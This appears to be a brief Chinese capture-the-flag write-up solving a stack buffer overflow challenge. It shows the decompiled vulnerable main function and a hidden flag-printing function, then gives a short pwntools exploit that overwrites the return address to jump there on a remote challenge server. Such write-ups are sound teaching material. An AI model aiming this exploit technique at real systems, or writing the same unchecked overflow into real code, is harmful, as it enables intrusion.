checksec看了下,四个保护都没有开。
main中代码如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [rsp+0h] [rbp-30h]
memset(&s, 0, 0x30uLL);
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("say something?");
read(0, &s, 0x100uLL);
puts("oh,that's so boring!");
return 0;
}
还看到了直接获取flag的get_shell_函数,地址是0x400751:
int get_shell_()
{
puts("tql~tql~tql~tql~tql~tql~tql");
puts("this is your flag!");
return system("cat flag");
}
可以利用read函数溢出让返回地址为0x400751,exp如下:
from pwn import *
p = remote('114.67.246.176',16081)
payload = 'a'*0x30+'a'*0x8+p64(0x400751)
p.sendline(payload)
p.interactive()
Alipay 
Wechat